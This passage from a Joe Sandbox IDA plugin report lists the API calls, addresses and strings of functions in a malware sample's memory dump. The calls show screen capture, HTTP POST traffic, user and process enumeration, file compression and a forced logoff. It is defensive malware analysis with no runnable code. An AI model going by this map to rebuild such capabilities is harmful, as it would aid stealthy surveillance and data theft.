Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A7595, Relevance: 1.5, APIs: 1, Instructions: 35

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,011A9E26,?,?), ref: 011A75AD

Part of subcall function 011A7607: RegQueryValueExW.KERNEL32(?,?,00000000,?,011A9E26,?,?,?,011A75CD,?,?,00000000,00000004,?), ref: 011A761F
Part of subcall function 011A7607: RegCloseKey.KERNEL32(?,?,011A75CD,?,?,00000000,00000004,?,?,?,?,011A9E26,?,?), ref: 011A762D

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119E45C, Relevance: 1.5, APIs: 1, Instructions: 24

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 0119E497

Part of subcall function 011A262D: WaitForSingleObject.KERNEL32(00000000,0119776D), ref: 011A2635

Part of subcall function 0119E240: GetMenu.USER32(?), ref: 0119E26A
Part of subcall function 0119E240: GetMenuItemCount.USER32(00000000), ref: 0119E280
Part of subcall function 0119E240: GetMenuState.USER32(00000000,00000000,00000400), ref: 0119E298
Part of subcall function 0119E240: HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 0119E2A8
Part of subcall function 0119E240: MenuItemFromPoint.USER32(?,00000000,?,?), ref: 0119E2CE
Part of subcall function 0119E240: GetMenuState.USER32(00000000,00000000,00000400), ref: 0119E2E2
Part of subcall function 0119E240: EndMenu.USER32 ref: 0119E2F2
Part of subcall function 0119E240: HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 0119E302
Part of subcall function 0119E240: GetSubMenu.USER32(00000000,00000000), ref: 0119E326
Part of subcall function 0119E240: GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 0119E340
Part of subcall function 0119E240: TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 0119E361
Part of subcall function 0119E240: GetMenuItemID.USER32(00000000,00000000), ref: 0119E379
Part of subcall function 0119E240: SendMessageW.USER32(?,00000111,?,00000000), ref: 0119E392
Part of subcall function 0119E240: SetKeyboardState.USER32 ref: 0119E3D1
Part of subcall function 0119E240: SetEvent.KERNEL32 ref: 0119E3DD

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A2507, Relevance: 1.5, APIs: 1, Instructions: 23

APIs

CreateMutexW.KERNELBASE(011B2C30,00000000,?,?,?,?,?), ref: 011A2528

Part of subcall function 011A6B07: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 011A6B0A
Part of subcall function 011A6B07: CloseHandle.KERNEL32(00000000), ref: 011A6B1C

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A34E5, Relevance: 1.5, APIs: 1, Instructions: 20

APIs

GetTimeZoneInformation.KERNELBASE(?), ref: 011A34F4

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A869F, Relevance: 1.5, APIs: 1, Instructions: 9

APIs

SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 011A86B1

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A9837, Relevance: 1.3, APIs: 1, Instructions: 6

APIs

CoUninitialize.OLE32 ref: 011A9845

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Non-executed Functions

Function 011A67DB, Relevance: 4.5, APIs: 3, Instructions: 27

APIs

socket.WS2_32(00000000,00000002,00000011), ref: 011A67E4
bind.WS2_32(00000000,00000017,-0000001D), ref: 011A6804
#3.WS2_32(00000000), ref: 011A680F

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119EA11, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 389

APIs

LoadLibraryA.KERNEL32(gdiplus.dll), ref: 0119EA43
GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0119EA54
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0119EA61
GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0119EA6E
GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0119EA7B
GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0119EA88
GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0119EA95
GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0119EAA2
LoadLibraryA.KERNEL32(ole32.dll), ref: 0119EAEA
GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0119EAF5
LoadLibraryA.KERNEL32(gdi32.dll), ref: 0119EB07
GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0119EB12
GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0119EB1E
GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0119EB2B
GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0119EB38
GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0119EB45
GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0119EB52
GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 0119EB5F
GetProcAddress.KERNEL32(00000000,DeleteDC), ref: 0119EB6C
LoadImageW.USER32(00000000,00007F00,00000002,00000000,00000000,00008040), ref: 0119EC10
GetIconInfo.USER32(00000000,?), ref: 0119EC25
GetCursorPos.USER32(?), ref: 0119EC33
DrawIcon.USER32(?,?,?,?), ref: 0119ED04

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

lstrcmpiW.KERNEL32(?,-00000030), ref: 0119ED85

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

FreeLibrary.KERNEL32(00000000), ref: 0119EE9C
FreeLibrary.KERNEL32(?), ref: 0119EEA6
FreeLibrary.KERNEL32(00000000), ref: 0119EEB0

Strings

GdiplusShutdown, xrefs: 0119EA56
DeleteDC, xrefs: 0119EB61
SelectObject, xrefs: 0119EB3A
CreateCompatibleDC, xrefs: 0119EB14
CreateStreamOnHGlobal, xrefs: 0119EAEC
GdipCreateBitmapFromHBITMAP, xrefs: 0119EA63
GdipGetImageEncodersSize, xrefs: 0119EA7D
GdipDisposeImage, xrefs: 0119EA70
DISPLAY, xrefs: 0119EBDE
GetDeviceCaps, xrefs: 0119EB2D
ole32.dll, xrefs: 0119EAE5
CreateDCW, xrefs: 0119EB09
gdi32.dll, xrefs: 0119EB02
GdipSaveImageToStream, xrefs: 0119EA97
GdiplusStartup, xrefs: 0119EA4B
CreateCompatibleBitmap, xrefs: 0119EB20
GdipGetImageEncoders, xrefs: 0119EA8A
DeleteObject, xrefs: 0119EB54
gdiplus.dll, xrefs: 0119EA25
BitBlt, xrefs: 0119EB47

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011954A9, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308

APIs

Part of subcall function 0119DCA2: GetClassNameW.USER32(012401CA,?,00000101), ref: 0119DCBD

GetWindowInfo.USER32(?,?), ref: 01195515
IntersectRect.USER32(?,?,-00000114), ref: 01195538
IntersectRect.USER32(?,?,-00000114), ref: 0119558E
GetDC.USER32(00000000), ref: 011955D2
CreateCompatibleDC.GDI32(00000000), ref: 011955E3
ReleaseDC.USER32(00000000,00000000), ref: 011955ED
SelectObject.GDI32(00000000,?), ref: 01195602
DeleteDC.GDI32(00000000), ref: 01195610
TlsSetValue.KERNEL32(?), ref: 0119565B
EqualRect.USER32(?,?), ref: 01195675
SaveDC.GDI32(00000000), ref: 01195680
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0119569B
SendMessageW.USER32(?,00000085,00000001,00000000), ref: 011956BB
DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 011956CD
RestoreDC.GDI32(00000000,?), ref: 011956E4
SaveDC.GDI32(00000000), ref: 01195706
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0119571C
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 01195735
RestoreDC.GDI32(00000000,?), ref: 01195743
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 01195756
SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 01195766
DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 01195778
TlsSetValue.KERNEL32(00000000), ref: 01195792
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 011957B2
DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 011957CE
SelectObject.GDI32(00000000,?), ref: 011957E4
DeleteDC.GDI32(00000000), ref: 011957EB
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 01195813

Part of subcall function 011953C7: GdiFlush.GDI32 ref: 0119541E

PrintWindow.USER32(00000008,00000000,00000000), ref: 01195829

Strings

<, xrefs: 0119550B

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A2D01, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 243

APIs

Part of subcall function 011A85D0: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 011A85F5
Part of subcall function 011A85D0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,011A2D27,?,?,00000000), ref: 011A8608
Part of subcall function 011A85D0: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,011A2D27,?,?,00000000), ref: 011A8630
Part of subcall function 011A85D0: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 011A8648
Part of subcall function 011A85D0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,011A2D27,?,?,00000000), ref: 011A8662
Part of subcall function 011A85D0: CloseHandle.KERNEL32(?), ref: 011A866B

Part of subcall function 011A8678: VirtualFree.KERNEL32(?,00000000,00008000,00000000,011AC83B,?,?,.exe,00000000,00000000,?,.exe,00000006), ref: 011A8689
Part of subcall function 011A8678: CloseHandle.KERNEL32(?), ref: 011A8697

CreateMutexW.KERNEL32(011B2C30,00000001,?,32901130,?,00000001,?), ref: 011A2D91
GetLastError.KERNEL32 ref: 011A2DA3
CloseHandle.KERNEL32(000001E6), ref: 011A2DBA

Part of subcall function 0119E89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 0119E8E0

Part of subcall function 011A31CC: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 011A31ED
Part of subcall function 011A31CC: Process32FirstW.KERNEL32(000001E6,?), ref: 011A3216
Part of subcall function 011A31CC: OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 011A3271
Part of subcall function 011A31CC: CloseHandle.KERNEL32(00000000), ref: 011A328E
Part of subcall function 011A31CC: GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 011A32A1
Part of subcall function 011A31CC: CloseHandle.KERNEL32(?), ref: 011A330E
Part of subcall function 011A31CC: Process32NextW.KERNEL32(000001E6,0000022C), ref: 011A331A
Part of subcall function 011A31CC: CloseHandle.KERNEL32(000001E6), ref: 011A332B

ExitWindowsEx.USER32(00000014,80000000), ref: 011A2DFD
OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 011A2E1C
SetEvent.KERNEL32(00000000), ref: 011A2E29
CloseHandle.KERNEL32(00000000), ref: 011A2E30

Part of subcall function 011A2A32: CloseHandle.KERNEL32(011B2AF0), ref: 011A2AF2

CloseHandle.KERNEL32(000001E6), ref: 011A2E42
ReadProcessMemory.KERNEL32(000000FF,01240014,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 011A2EA6
Sleep.KERNEL32(000001F4), ref: 011A2EB8
IsWellKnownSid.ADVAPI32(01F1F7D0,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 011A2EC9
ReadProcessMemory.KERNEL32(000000FF,01240014,00000000,00000001,00000000), ref: 011A2EF1
GetFileAttributesExW.KERNEL32({3FF5AE44-1EE1-8646-676C-E42BACAD1769},78F16360,0000000C), ref: 011A2F0D
VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 011A2F50

Part of subcall function 011A97D0: VirtualProtect.KERNEL32(011ACA1A,?,00000040,00000000,01240014,?,?,011A2F6C,?,?), ref: 011A97E5
Part of subcall function 011A97D0: VirtualProtect.KERNEL32(011ACA1A,?,00000000,00000000,?,?,011A2F6C,?,?), ref: 011A9818

CreateEventW.KERNEL32(011B2C30,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,C:\Users\admin\AppData\Roaming,00000000,?,?,?), ref: 011A2FCE
WaitForSingleObject.KERNEL32(?,000000FF), ref: 011A2FE7
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 011A2FF7
CloseHandle.KERNEL32(0000000C), ref: 011A300D
CloseHandle.KERNEL32(?), ref: 011A3013
CloseHandle.KERNEL32(?), ref: 011A3016

Part of subcall function 011A6B8E: ReleaseMutex.KERNEL32(00000000,011A3021,?,?,?), ref: 011A6B92

Part of subcall function 011AD0E6: LoadLibraryW.KERNEL32(?), ref: 011AD107
Part of subcall function 011AD0E6: GetProcAddress.KERNEL32(00000000,?), ref: 011AD128
Part of subcall function 011AD0E6: SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 011AD159
Part of subcall function 011AD0E6: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 011AD17C
Part of subcall function 011AD0E6: FreeLibrary.KERNEL32(00000000), ref: 011AD1A3
Part of subcall function 011AD0E6: NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 011AD1D9
Part of subcall function 011AD0E6: NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 011AD212
Part of subcall function 011AD0E6: NetApiBufferFree.NETAPI32(?,?,?), ref: 011AD2AB
Part of subcall function 011AD0E6: NetApiBufferFree.NETAPI32(?), ref: 011AD2BE
Part of subcall function 011AD0E6: SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 011AD2E2

Part of subcall function 011A4E20: CharToOemW.USER32(?,?), ref: 011A4E35

Part of subcall function 011A6B9E: OpenMutexW.KERNEL32(00100000,00000000,00000000,011A2E87,?,19367401,?,00000001,8889347B,00000002), ref: 011A6BA9
Part of subcall function 011A6B9E: CloseHandle.KERNEL32(00000000), ref: 011A6BB4

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Part of subcall function 011A2507: CreateMutexW.KERNELBASE(011B2C30,00000000,?,?,?,?,?), ref: 011A2528

Part of subcall function 011ACCCF: StrCmpNIW.SHLWAPI(C:\Users\admin\AppData\Roaming,01F1F800,00000000), ref: 011ACD57
Part of subcall function 011ACCCF: lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 011ACD6F

Strings

C:\Users\admin\AppData\Roaming, xrefs: 011A2F35, 011A2F6C, 011A2F94
{3FF5AE44-1EE1-8646-676C-E42BACAD1769}, xrefs: 011A2F08
, xrefs: 011A2DD7

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119DD09, Relevance: 25.7, APIs: 17, Instructions: 205

APIs

TlsAlloc.KERNEL32(011B2868,00000000,0000018C,00000000,00000000), ref: 0119DD22
RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0119DD4A
CreateEventW.KERNEL32(011B2C30,00000001,00000000,?,84889912,?,00000001), ref: 0119DD74
CreateMutexW.KERNEL32(011B2C30,00000000,?,18782822,?,00000001), ref: 0119DD97
CreateFileMappingW.KERNEL32(00000000,011B2C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0119DDC2
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0119DDD8
GetDC.USER32(00000000), ref: 0119DDF5
GetDeviceCaps.GDI32(00000000,00000008), ref: 0119DE15
GetDeviceCaps.GDI32(?,0000000A), ref: 0119DE1F
CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0119DE32

Part of subcall function 011A9959: GetDIBits.GDI32(00000000,0119DE4B,00000000,00000001,00000000,00000000,00000000), ref: 011A9991
Part of subcall function 011A9959: GetDIBits.GDI32(00000000,0119DE4B,00000000,00000001,00000000,00000000,00000000), ref: 011A99A7
Part of subcall function 011A9959: DeleteObject.GDI32(0119DE4B), ref: 011A99B4
Part of subcall function 011A9959: CreateDIBSection.GDI32(00000000,00000000,00000000,011B2888,?,?), ref: 011A9A24
Part of subcall function 011A9959: DeleteObject.GDI32(0119DE4B), ref: 011A9A43

ReleaseDC.USER32(00000000,?), ref: 0119DE56

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

CreateMutexW.KERNEL32(011B2C30,00000000,?,1898B122,?,00000001,011B28B8,?,00000102,011B28A4,011B2E70,00000010,?,?), ref: 0119DF00
GetDC.USER32(00000000), ref: 0119DF15
CreateCompatibleDC.GDI32(00000000), ref: 0119DF23
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0119DF3A
SelectObject.GDI32(00000000,00000000), ref: 0119DF4D
ReleaseDC.USER32(00000000,00000001), ref: 0119DF65

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A1A04, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 182

APIs

Part of subcall function 011A7E19: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 011A7E48

InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 011A1A36
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 011A1A57
HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 011A1AA6
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 011A1AFD

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 011A1B75
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 011A1B98
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 011A1BC0

Part of subcall function 011A54F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 011A5505
Part of subcall function 011A54F1: GetLastError.KERNEL32 ref: 011A550F
Part of subcall function 011A54F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 011A552F

InternetCloseHandle.WININET(00000000), ref: 011A1C05
InternetCloseHandle.WININET(?), ref: 011A1C0F
InternetCloseHandle.WININET(?), ref: 011A1C19

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Strings

POST, xrefs: 011A1A6F
GET, xrefs: 011A1A76, 011A1AA1
HTTP/1.1, xrefs: 011A1A98

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119E240, Relevance: 22.6, APIs: 15, Instructions: 132

APIs

GetMenu.USER32(?), ref: 0119E26A
GetMenuItemCount.USER32(00000000), ref: 0119E280
GetMenuState.USER32(00000000,00000000,00000400), ref: 0119E298
HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 0119E2A8
MenuItemFromPoint.USER32(?,00000000,?,?), ref: 0119E2CE
GetMenuState.USER32(00000000,00000000,00000400), ref: 0119E2E2
EndMenu.USER32 ref: 0119E2F2
HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 0119E302
GetSubMenu.USER32(00000000,00000000), ref: 0119E326
GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 0119E340
TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 0119E361
GetMenuItemID.USER32(00000000,00000000), ref: 0119E379
SendMessageW.USER32(?,00000111,?,00000000), ref: 0119E392

Part of subcall function 011954A9: GetWindowInfo.USER32(?,?), ref: 01195515
Part of subcall function 011954A9: IntersectRect.USER32(?,?,-00000114), ref: 01195538
Part of subcall function 011954A9: IntersectRect.USER32(?,?,-00000114), ref: 0119558E
Part of subcall function 011954A9: GetDC.USER32(00000000), ref: 011955D2
Part of subcall function 011954A9: CreateCompatibleDC.GDI32(00000000), ref: 011955E3
Part of subcall function 011954A9: ReleaseDC.USER32(00000000,00000000), ref: 011955ED
Part of subcall function 011954A9: SelectObject.GDI32(00000000,?), ref: 01195602
Part of subcall function 011954A9: DeleteDC.GDI32(00000000), ref: 01195610
Part of subcall function 011954A9: TlsSetValue.KERNEL32(?), ref: 0119565B
Part of subcall function 011954A9: EqualRect.USER32(?,?), ref: 01195675
Part of subcall function 011954A9: SaveDC.GDI32(00000000), ref: 01195680
Part of subcall function 011954A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0119569B
Part of subcall function 011954A9: SendMessageW.USER32(?,00000085,00000001,00000000), ref: 011956BB
Part of subcall function 011954A9: DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 011956CD
Part of subcall function 011954A9: RestoreDC.GDI32(00000000,?), ref: 011956E4
Part of subcall function 011954A9: SaveDC.GDI32(00000000), ref: 01195706
Part of subcall function 011954A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0119571C
Part of subcall function 011954A9: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 01195735
Part of subcall function 011954A9: RestoreDC.GDI32(00000000,?), ref: 01195743
Part of subcall function 011954A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 01195756
Part of subcall function 011954A9: SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 01195766
Part of subcall function 011954A9: DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 01195778
Part of subcall function 011954A9: TlsSetValue.KERNEL32(00000000), ref: 01195792
Part of subcall function 011954A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 011957B2
Part of subcall function 011954A9: DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 011957CE
Part of subcall function 011954A9: SelectObject.GDI32(00000000,?), ref: 011957E4
Part of subcall function 011954A9: DeleteDC.GDI32(00000000), ref: 011957EB
Part of subcall function 011954A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 01195813
Part of subcall function 011954A9: PrintWindow.USER32(00000008,00000000,00000000), ref: 01195829

SetKeyboardState.USER32 ref: 0119E3D1
SetEvent.KERNEL32 ref: 0119E3DD

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A70A1, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52

APIs

LoadLibraryA.KERNEL32(cabinet.dll), ref: 011A70B5
GetProcAddress.KERNEL32(00000000,FCICreate,?,?,011A73A4,?,?,00000000,?), ref: 011A70D5
GetProcAddress.KERNEL32(FCIAddFile,?,011A73A4,?,?,00000000,?), ref: 011A70E7
GetProcAddress.KERNEL32(FCIFlushCabinet,?,011A73A4,?,?,00000000,?), ref: 011A70F9
GetProcAddress.KERNEL32(FCIDestroy,?,011A73A4,?,?,00000000,?), ref: 011A710B
HeapCreate.KERNEL32(00000000,00080000,00000000,011A73A4,?,?,00000000,?), ref: 011A7136
FreeLibrary.KERNEL32(011A73A4,?,?,00000000,?), ref: 011A714B

Strings

FCIDestroy, xrefs: 011A70FB
FCIFlushCabinet, xrefs: 011A70E9
FCICreate, xrefs: 011A70CF
cabinet.dll, xrefs: 011A70B0
FCIAddFile, xrefs: 011A70D7

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011950A7, Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 194

APIs

EnterCriticalSection.KERNEL32(011B23AC,0000FDE9,?), ref: 0119515C

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

LeaveCriticalSection.KERNEL32(011B23AC,?,000000FF), ref: 011951B7
EnterCriticalSection.KERNEL32(011B23AC), ref: 011951D2
getpeername.WS2_32 ref: 0119527F

Part of subcall function 011A681C: WSAAddressToStringW.WS2_32(?,-0000001D,00000000,?,?), ref: 011A6840

Strings

\[EP, xrefs: 011950E8
OMAV, xrefs: 01195232
Z\AV, xrefs: 01195248
YIST, xrefs: 0119523A
]QPG, xrefs: 0119522A
EASV, xrefs: 01195250
YISQ, xrefs: 011950EF

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011AD0E6, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188

APIs

LoadLibraryW.KERNEL32(?), ref: 011AD107
GetProcAddress.KERNEL32(00000000,?), ref: 011AD128
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 011AD159
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 011AD17C
FreeLibrary.KERNEL32(00000000), ref: 011AD1A3
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 011AD1D9
NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 011AD212

Part of subcall function 01197125: ConvertSidToStringSidW.ADVAPI32(?,?), ref: 01197138
Part of subcall function 01197125: PathUnquoteSpacesW.SHLWAPI(?), ref: 011971A0
Part of subcall function 01197125: ExpandEnvironmentStringsW.KERNEL32(?,011AD23A,00000104), ref: 011971AD
Part of subcall function 01197125: LocalFree.KERNEL32(?,.exe,00000000), ref: 011971C0

NetApiBufferFree.NETAPI32(?,?,?), ref: 011AD2AB

Part of subcall function 011A8C40: PathCombineW.SHLWAPI(011A1F45,011A1F45,?), ref: 011A8C5F

Part of subcall function 011A89C2: PathSkipRootW.SHLWAPI(?), ref: 011A89CD
Part of subcall function 011A89C2: GetFileAttributesW.KERNEL32(?,?,00000000,011AD261,?,?,?,?,?), ref: 011A89F5
Part of subcall function 011A89C2: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,011AD261,?,?,?,?,?), ref: 011A8A03

Part of subcall function 011AC912: LoadLibraryW.KERNEL32(?), ref: 011AC929
Part of subcall function 011AC912: GetProcAddress.KERNEL32(?,?,.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,011AD2A8), ref: 011AC955
Part of subcall function 011AC912: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,011AD2A8,?,?), ref: 011AC96C
Part of subcall function 011AC912: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,011AD2A8,?,?), ref: 011AC984
Part of subcall function 011AC912: WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,011AD2A8,?,?,00000000), ref: 011AC9A1
Part of subcall function 011AC912: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,011AD2A8,?,?,00000000), ref: 011ACA0D

NetApiBufferFree.NETAPI32(?), ref: 011AD2BE
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 011AD2E2

Part of subcall function 011A786B: PathAddExtensionW.SHLWAPI(?,00000000), ref: 011A78AC
Part of subcall function 011A786B: GetFileAttributesW.KERNEL32(?,?,?,?,?,00000000), ref: 011A78B9

Strings

.exe, xrefs: 011AD1BB, 011AD267, 011AD2EE

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011AC095, Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 254

APIs

